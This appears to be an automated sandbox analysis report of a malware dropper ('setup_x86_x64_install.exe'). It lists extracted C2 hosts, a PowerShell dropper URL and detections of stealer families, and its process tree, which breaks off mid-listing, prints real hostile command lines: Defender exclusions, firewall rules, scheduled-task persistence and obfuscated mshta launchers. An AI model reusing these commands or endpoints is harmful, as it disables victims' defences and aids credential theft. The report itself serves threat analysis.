Resubmissions

11-10-2021 20:45

211011-zjxjlsabbm 10

11-10-2021 13:10

211011-qegsxshcfp 10

11-10-2021 10:55

211011-mz7y3ahaak 10

10-10-2021 19:24

211010-x4mtssgae2 10

Analysis

  • max time kernel
    1632s
  • max time network
    1635s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    11-10-2021 20:45

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.9MB

  • MD5

    a4d23ac3c7172b9aa02e35b6bf0fd21f

  • SHA1

    0326aab7deddfefc048c9a67ac9ce4ee14ea9003

  • SHA256

    9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806

  • SHA512

    9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

vidar

Version

41.3

Botnet

921

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    921

Extracted

Family

smokeloader

Version

2020

C2

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 25 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

  • suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

  • suricata: ET MALWARE Zbot Generic URI/Header Struct .bin

    suricata: ET MALWARE Zbot Generic URI/Header Struct .bin

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 10 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 63 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 16 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 45 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 53 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 24 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 53 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 2 IoCs
  • Runs net.exe
  • Script User-Agent 5 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 55 IoCs
  • Suspicious use of SetWindowsHookEx 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2924
      • C:\Windows\system32\SystemSettingsAdminFlows.exe
        "C:\Windows\system32\SystemSettingsAdminFlows.exe" SetTimeZoneAutoUpdate 0
        2⤵
        • Modifies data under HKEY_USERS
        PID:1572
      • C:\Windows\system32\SystemSettingsAdminFlows.exe
        "C:\Windows\system32\SystemSettingsAdminFlows.exe" SetTimeZoneAutoUpdate 0
        2⤵
          PID:4732
        • C:\Windows\system32\SystemSettingsAdminFlows.exe
          "C:\Windows\system32\SystemSettingsAdminFlows.exe" SetInternetTime 0
          2⤵
            PID:1508
          • C:\Windows\system32\SystemSettingsAdminFlows.exe
            "C:\Windows\system32\SystemSettingsAdminFlows.exe" SetInternetTime 1
            2⤵
              PID:2108
            • C:\Windows\system32\SystemSettingsAdminFlows.exe
              "C:\Windows\system32\SystemSettingsAdminFlows.exe" SetTimeZoneAutoUpdate 0
              2⤵
                PID:5152
              • C:\Windows\system32\SystemSettingsAdminFlows.exe
                "C:\Windows\system32\SystemSettingsAdminFlows.exe" SetInternetTime 1
                2⤵
                  PID:5260
              • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:4388
                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3684
                  • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\setup_install.exe
                    "C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\setup_install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:3304
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2192
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4520
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3716
                      • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun152bab5a2de.exe
                        Sun152bab5a2de.exe
                        5⤵
                        • Executes dropped EXE
                        PID:1948
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3916
                      • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun15901f2f025e.exe
                        Sun15901f2f025e.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1284
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 1616
                          6⤵
                          • Program crash
                          • Checks processor information in registry
                          • Enumerates system info in registry
                          PID:2792
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5104
                      • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun15dbd675f871ca.exe
                        Sun15dbd675f871ca.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:928
                        • C:\Users\Admin\Pictures\Adobe Films\rqV5rg5MqBTyRFl_QChu83xv.exe
                          "C:\Users\Admin\Pictures\Adobe Films\rqV5rg5MqBTyRFl_QChu83xv.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5456
                        • C:\Users\Admin\Pictures\Adobe Films\bXiET63NoA40I8lHcTRtnbrY.exe
                          "C:\Users\Admin\Pictures\Adobe Films\bXiET63NoA40I8lHcTRtnbrY.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:5244
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 272
                            7⤵
                            • Program crash
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            PID:3580
                        • C:\Users\Admin\Pictures\Adobe Films\glz67OOpC2tuerj9RpKCBbM0.exe
                          "C:\Users\Admin\Pictures\Adobe Films\glz67OOpC2tuerj9RpKCBbM0.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          PID:5216
                          • C:\Users\Admin\Pictures\Adobe Films\glz67OOpC2tuerj9RpKCBbM0.exe
                            "C:\Users\Admin\Pictures\Adobe Films\glz67OOpC2tuerj9RpKCBbM0.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:3276
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 2064
                              8⤵
                              • Program crash
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              PID:5656
                        • C:\Users\Admin\Pictures\Adobe Films\cVHx5DOsaGFNa14CyYPY8JyW.exe
                          "C:\Users\Admin\Pictures\Adobe Films\cVHx5DOsaGFNa14CyYPY8JyW.exe"
                          6⤵
                            PID:4008
                          • C:\Users\Admin\Pictures\Adobe Films\5a4lcgnoa4cnRxjJT1l6kWBO.exe
                            "C:\Users\Admin\Pictures\Adobe Films\5a4lcgnoa4cnRxjJT1l6kWBO.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5124
                            • C:\Users\Admin\Pictures\Adobe Films\5a4lcgnoa4cnRxjJT1l6kWBO.exe
                              "C:\Users\Admin\Pictures\Adobe Films\5a4lcgnoa4cnRxjJT1l6kWBO.exe"
                              7⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:2860
                          • C:\Users\Admin\Pictures\Adobe Films\7gVpNsXj2opFkCHb3Vf2zf23.exe
                            "C:\Users\Admin\Pictures\Adobe Films\7gVpNsXj2opFkCHb3Vf2zf23.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1528
                            • C:\Users\Admin\Pictures\Adobe Films\7gVpNsXj2opFkCHb3Vf2zf23.exe
                              "C:\Users\Admin\Pictures\Adobe Films\7gVpNsXj2opFkCHb3Vf2zf23.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:6520
                          • C:\Users\Admin\Pictures\Adobe Films\A2_WFaSJhbxBbj3Hl3RLlao4.exe
                            "C:\Users\Admin\Pictures\Adobe Films\A2_WFaSJhbxBbj3Hl3RLlao4.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            PID:5424
                            • C:\Users\Admin\Pictures\Adobe Films\A2_WFaSJhbxBbj3Hl3RLlao4.exe
                              "C:\Users\Admin\Pictures\Adobe Films\A2_WFaSJhbxBbj3Hl3RLlao4.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:3712
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 2000
                              7⤵
                              • Program crash
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              PID:6976
                          • C:\Users\Admin\Pictures\Adobe Films\fMXPRg0cC35BrrRzxIIsLqAz.exe
                            "C:\Users\Admin\Pictures\Adobe Films\fMXPRg0cC35BrrRzxIIsLqAz.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:5372
                          • C:\Users\Admin\Pictures\Adobe Films\n48CwAwegLK1Ww__xpPNfcg0.exe
                            "C:\Users\Admin\Pictures\Adobe Films\n48CwAwegLK1Ww__xpPNfcg0.exe"
                            6⤵
                            • Executes dropped EXE
                            • Windows security modification
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System policy modification
                            PID:2500
                            • C:\Users\Admin\AppData\Local\Temp\ef02b328-28e0-4d09-b178-8dd8b575e806\AdvancedRun.exe
                              "C:\Users\Admin\AppData\Local\Temp\ef02b328-28e0-4d09-b178-8dd8b575e806\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ef02b328-28e0-4d09-b178-8dd8b575e806\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                              7⤵
                              • Executes dropped EXE
                              PID:1744
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ef02b328-28e0-4d09-b178-8dd8b575e806\test.bat"
                                8⤵
                                  PID:4112
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\n48CwAwegLK1Ww__xpPNfcg0.exe" -Force
                                7⤵
                                  PID:5808
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\n48CwAwegLK1Ww__xpPNfcg0.exe" -Force
                                  7⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  PID:5784
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    8⤵
                                      PID:7120
                                  • C:\Users\Admin\Pictures\Adobe Films\n48CwAwegLK1Ww__xpPNfcg0.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\n48CwAwegLK1Ww__xpPNfcg0.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4008
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 2580
                                    7⤵
                                    • Program crash
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    PID:7160
                                • C:\Users\Admin\Pictures\Adobe Films\6nKrVH15hkZN6yvoADMfSVX8.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\6nKrVH15hkZN6yvoADMfSVX8.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5548
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 280
                                    7⤵
                                    • Program crash
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    PID:2240
                                • C:\Users\Admin\Pictures\Adobe Films\9FFmVj3i1ybiSWThFrCUJUyU.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\9FFmVj3i1ybiSWThFrCUJUyU.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5444
                                • C:\Users\Admin\Pictures\Adobe Films\BVe0hoARxMZgZJAIRbcF2GUf.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\BVe0hoARxMZgZJAIRbcF2GUf.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5272
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5272 -s 280
                                    7⤵
                                    • Program crash
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    PID:5304
                                • C:\Users\Admin\Pictures\Adobe Films\jz3J_9pZqlliyVDD6uYJZLEi.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\jz3J_9pZqlliyVDD6uYJZLEi.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:5980
                                • C:\Users\Admin\Pictures\Adobe Films\liuT0NorrttTv_qJ15rda_JI.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\liuT0NorrttTv_qJ15rda_JI.exe"
                                  6⤵
                                    PID:5332
                                  • C:\Users\Admin\Pictures\Adobe Films\Q9B2dQ4v6gZueJNnr_JQLgNm.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\Q9B2dQ4v6gZueJNnr_JQLgNm.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:5020
                                  • C:\Users\Admin\Pictures\Adobe Films\UwWnGxoUXNNVI11BqOPBOtyF.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\UwWnGxoUXNNVI11BqOPBOtyF.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Drops startup file
                                    PID:1204
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe
                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      PID:6548
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                        8⤵
                                          PID:4636
                                        • C:\Windows\System32\netsh.exe
                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                          8⤵
                                            PID:5400
                                          • C:\Windows\SYSTEM32\schtasks.exe
                                            schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                            8⤵
                                            • Creates scheduled task(s)
                                            PID:3692
                                          • C:\Windows\System\svchost.exe
                                            "C:\Windows\System\svchost.exe" formal
                                            8⤵
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            PID:5940
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                              9⤵
                                                PID:6148
                                              • C:\Windows\System32\netsh.exe
                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                9⤵
                                                  PID:3260
                                                • C:\Windows\System32\netsh.exe
                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                  9⤵
                                                    PID:1596
                                                • C:\Windows\System32\netsh.exe
                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                  8⤵
                                                    PID:6424
                                              • C:\Users\Admin\Pictures\Adobe Films\MhsYiZaK7H0GAa2qtNKGyCGy.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\MhsYiZaK7H0GAa2qtNKGyCGy.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:4524
                                              • C:\Users\Admin\Pictures\Adobe Films\4GuCDW_8gRX4hclo_yN92fi_.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\4GuCDW_8gRX4hclo_yN92fi_.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5560
                                              • C:\Users\Admin\Pictures\Adobe Films\EsvyN0W_aDygiGKUTN6rOltB.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\EsvyN0W_aDygiGKUTN6rOltB.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5612
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5332
                                              • C:\Users\Admin\Pictures\Adobe Films\a4srLLvLdkfqUx4VuKwDYNsp.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\a4srLLvLdkfqUx4VuKwDYNsp.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5528
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2216
                                            • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun15f67075f27a2b5b.exe
                                              Sun15f67075f27a2b5b.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:1528
                                              • C:\Users\Admin\AppData\Roaming\3211254.scr
                                                "C:\Users\Admin\AppData\Roaming\3211254.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5564
                                              • C:\Users\Admin\AppData\Roaming\5331221.scr
                                                "C:\Users\Admin\AppData\Roaming\5331221.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:5604
                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5888
                                              • C:\Users\Admin\AppData\Roaming\3743954.scr
                                                "C:\Users\Admin\AppData\Roaming\3743954.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5832
                                              • C:\Users\Admin\AppData\Roaming\3551970.scr
                                                "C:\Users\Admin\AppData\Roaming\3551970.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:1488
                                              • C:\Users\Admin\AppData\Roaming\2243634.scr
                                                "C:\Users\Admin\AppData\Roaming\2243634.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                PID:3116
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun158d8ef840.exe
                                            4⤵
                                              PID:4712
                                              • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun158d8ef840.exe
                                                Sun158d8ef840.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:2772
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun158d8ef840.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                  6⤵
                                                    PID:5412
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun158d8ef840.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun158d8ef840.exe" ) do taskkill /F -Im "%~NxU"
                                                      7⤵
                                                        PID:5584
                                                        • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                          09xU.EXE -pPtzyIkqLZoCarb5ew
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:5320
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                            9⤵
                                                              PID:4152
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                10⤵
                                                                  PID:7120
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                9⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                PID:6724
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                  10⤵
                                                                    PID:3572
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                      11⤵
                                                                        PID:5384
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                        11⤵
                                                                          PID:6072
                                                                        • C:\Windows\SysWOW64\control.exe
                                                                          control .\R6f7sE.I
                                                                          11⤵
                                                                            PID:1780
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                              12⤵
                                                                              • Loads dropped DLL
                                                                              PID:6440
                                                                              • C:\Windows\system32\RunDll32.exe
